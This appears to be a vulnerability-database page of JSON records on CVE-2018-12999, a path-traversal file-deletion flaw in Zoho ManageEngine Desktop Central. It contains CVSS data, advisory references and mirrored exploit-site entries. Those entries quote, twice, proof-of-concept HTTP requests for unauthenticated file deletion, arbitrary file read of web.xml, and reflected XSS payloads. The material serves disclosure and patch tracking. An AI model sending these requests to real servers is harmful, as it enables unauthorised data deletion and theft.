DATABASE RESOURCES PRICING ABOUT US

{"id": "CVE-2018-12999", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2018-12999", "description": "Incorrect Access Control in AgentTrayIconServlet in Zoho ManageEngine Desktop Central 10.0.255 allows attackers to delete certain files on the web server without login by sending a specially crafted request to the server with a computerName=../ substring to the /agenttrayicon URI.", "published": "2018-06-29T12:29:00", "modified": "2018-08-20T11:56:00", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 6.4}, "severity": "MEDIUM", "exploitabilityScore": 10.0, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-12999", "reporter": "cve@mitre.org", "references": ["https://github.com/unh3x/just4cve/issues/9", "http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201807-035", "http://seclists.org/fulldisclosure/2018/Jul/74", "http://packetstormsecurity.com/files/148635/Zoho-ManageEngine-13-13790-build-XSS-File-Read-File-Deletion.html"], "cvelist": ["CVE-2018-12999"], "immutableFields": [], "lastseen": "2022-03-23T12:46:53", "viewCount": 12, "enchantments": {"dependencies": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2018-1103"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:148635"]}, {"type": "zdt", "idList": ["1337DAY-ID-30757"]}], "rev": 4}, "score": {"value": 5.0, "vector": "NONE"}, "backreferences": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2018-1103"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:148635"]}, {"type": "zdt", "idList": ["1337DAY-ID-30757"]}]}, "exploitation": null, "vulnersScore": 5.0}, "_state": {"dependencies": 1659854349, "score": 1659797217}, "_internal": {"score_hash": "eceb34652c3cef23ebe1f5dfbf97466b"}, "cna_cvss": {"cna": null, "cvss": {}}, "cpe": ["cpe:/a:zohocorp:manageengine_desktop_central:10.0.255"], "cpe23": ["cpe:2.3:a:zohocorp:manageengine_desktop_central:10.0.255:*:*:*:*:*:*:*"], "cwe": ["CWE-20"], "affectedSoftware": [{"cpeName": "zohocorp:manageengine_desktop_central", "version": "10.0.255", "operator": "eq", "name": "zohocorp manageengine desktop central"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:zohocorp:manageengine_desktop_central:10.0.255:*:*:*:*:*:*:*", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://github.com/unh3x/just4cve/issues/9", "name": "https://github.com/unh3x/just4cve/issues/9", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201807-035", "name": "http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201807-035", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "http://seclists.org/fulldisclosure/2018/Jul/74", "name": "20180720 [CVE-2018-12999]Zoho manageengine Desktop Central Arbitrary File Deletion", "refsource": "FULLDISC", "tags": ["Exploit", "Mailing List", "Third Party Advisory"]}, {"url": "http://packetstormsecurity.com/files/148635/Zoho-ManageEngine-13-13790-build-XSS-File-Read-File-Deletion.html", "name": "http://packetstormsecurity.com/files/148635/Zoho-ManageEngine-13-13790-build-XSS-File-Read-File-Deletion.html", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}]}

{"checkpoint_advisories": [{"lastseen": "2021-12-17T11:25:42", "description": "An arbitrary file deletion vulnerability exists in Zoho ManageEngine Desktop Central. The vulnerability is due to insufficient input validation in requests handled by AgentTrayIconServlet.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-11-22T00:00:00", "type": "checkpoint_advisories", "title": "Zoho ManageEngine Desktop Central Arbitrary File Deletion (CVE-2018-12999)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-12999"], "modified": "2018-12-02T00:00:00", "id": "CPAI-2018-1103", "href": "", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}], "packetstorm": [{"lastseen": "2018-07-23T01:54:10", "description": "", "cvss3": {}, "published": "2018-07-22T00:00:00", "type": "packetstorm", "title": "Zoho ManageEngine 13 (13790 build) XSS / File Read / File Deletion", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-12996", "CVE-2018-12999", "CVE-2018-12998", "CVE-2018-12997"], "modified": "2018-07-22T00:00:00", "id": "PACKETSTORM:148635", "href": "https://packetstormsecurity.com/files/148635/Zoho-ManageEngine-13-13790-build-XSS-File-Read-File-Deletion.html", "sourceData": "`This issue has been reported to the vendor who has already published patches for this issue. \nhttps://www.manageengine.com/products/applications_manager/issues.html \n \n \n========================== \nAdvisory:Zoho manageengine Applications Manager Reflected XSSVulnerability \nAuthor: M3 From DBAppSecurity \nAffected Version: All \n========================== \nProof of Concept: \n========================== \n/GraphicalView.do?method=createBusinessService\"scriptalert(5045)/script \n \n \nNotice: It can be successfully reproduced under IE.This issue has been reported to the vendor who has already published patches for this issue. \nhttp://opmanager.helpdocsonline.com/read-me \n \n \n========================== \nAdvisory:Zoho manageengine Arbitrary File Read in multiple Products \nAuthor: M3 From DBAppSecurity \nAffected Products: \nNetflow Analyzer Network Configuration Manager OpManager Oputils Opmanagerplus firewall analyzer \n========================== \nProof of Concept: \n========================== \nPOST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=copyfilefileName=WEB-INF/web.xml HTTP/1.1 Host: 192.168.11.103:8888 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Length: 0 xx \n \n \nNotice: This vul can reproduce without login.This issue has been reported to the vendor who has already published patches for this issue. \n \n \n \n \n========================== \nAdvisory: Zoho manageengine Desktop Central Arbitrary File Deletion \nAuthor: M3 From DBAppSecurity \nAffected Products:Desktop Central \n========================== \nProof of Concept: \n========================== \n \n \nPOST /agenttrayicon HTTP/1.1 Host: 192.168.1.203:8020 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 129 screenShotAttached=yesvideo_type=2customerId=1computerName=../../../resourceId=xxxfilename=../images/demo/loginas_bottom.gif \n \n \nNotice: This vul can reproduce without login, file deletion is damageable, so use a useless file for test.This issue has been reported to the vendor who has already published patches for this issue. \nhttp://opmanager.helpdocsonline.com/read-me \n \n \n========================== \nAdvisory: Zoho manageengine Reflected XSS in multiple Products \nAuthor: M3 From DBAppSecurity \nAffected Products: \nNetflow Analyzer Network Configuration Manager OpManager Oputils Opmanagerplus firewall analyzer \n========================== \nProof of Concept: \n========================== \n/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=11111111scriptalert(1)/script \n \n \nNotice: This vul can reproduce without login. \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/148635/zohome-xssfile.txt", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2018-07-23T14:14:14", "description": "Exploit for php platform in category web applications", "cvss3": {}, "published": "2018-07-23T00:00:00", "type": "zdt", "title": "Zoho ManageEngine 13 (13790 build) XSS / File Read / File Deletion Vulnerabilities", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-12996", "CVE-2018-12999", "CVE-2018-12998", "CVE-2018-12997"], "modified": "2018-07-23T00:00:00", "id": "1337DAY-ID-30757", "href": "https://0day.today/exploit/description/30757", "sourceData": "This issue has been reported to the vendor who has already published patches for this issue.\r\nhttps://www.manageengine.com/products/applications_manager/issues.html\r\n\r\n\r\n==========================\r\nAdvisory: Zoho manageengine Applications Manager Reflected XSS Vulnerability\r\nAuthor: M3 From DBAppSecurity\r\nAffected Version: All\r\n==========================\r\nProof of Concept:\r\n==========================\r\n/GraphicalView.do?method=createBusinessService\"scriptalert(5045)/script\r\n\r\n\r\nNotice: It can be successfully reproduced under IE.This issue has been reported to the vendor who has already published patches for this issue.\r\nhttp://opmanager.helpdocsonline.com/read-me\r\n\r\n\r\n==========================\r\nAdvisory:Zoho manageengine Arbitrary File Read in multiple Products\r\nAuthor: M3 From DBAppSecurity\r\nAffected Products:\r\nNetflow Analyzer Network Configuration Manager OpManager Oputils Opmanagerplus firewall analyzer\r\n==========================\r\nProof of Concept:\r\n==========================\r\nPOST /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=copyfilefileName=WEB-INF/web.xml HTTP/1.1 Host: 192.168.11.103:8888 Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Length: 0 xx\r\n\r\n\r\nNotice: This vul can reproduce without login.This issue has been reported to the vendor who has already published patches for this issue.\r\n\r\n\r\n\r\n\r\n==========================\r\nAdvisory: Zoho manageengine Desktop Central Arbitrary File Deletion\r\nAuthor: M3 From DBAppSecurity\r\nAffected Products:Desktop Central\r\n==========================\r\nProof of Concept:\r\n==========================\r\n\r\n\r\nPOST /agenttrayicon HTTP/1.1 Host: 192.168.1.203:8020 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 129 screenShotAttached=yesvideo_type=2customerId=1computerName=../../../resourceId=xxxfilename=../images/demo/loginas_bottom.gif\r\n\r\n\r\nNotice: This vul can reproduce without login, file deletion is damageable, so use a useless file for test.This issue has been reported to the vendor who has already published patches for this issue.\r\nhttp://opmanager.helpdocsonline.com/read-me\r\n\r\n\r\n==========================\r\nAdvisory: Zoho manageengine Reflected XSS in multiple Products\r\nAuthor: M3 From DBAppSecurity\r\nAffected Products:\r\nNetflow Analyzer Network Configuration Manager OpManager Oputils Opmanagerplus firewall analyzer\r\n==========================\r\nProof of Concept:\r\n==========================\r\n/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet?operation=11111111scriptalert(1)/script\r\n\r\n\r\nNotice: This vul can reproduce without login.\n\n# 0day.today [2018-07-23] #", "sourceHref": "https://0day.today/exploit/30757", "cvss": {"score": 0.0, "vector": "NONE"}}]}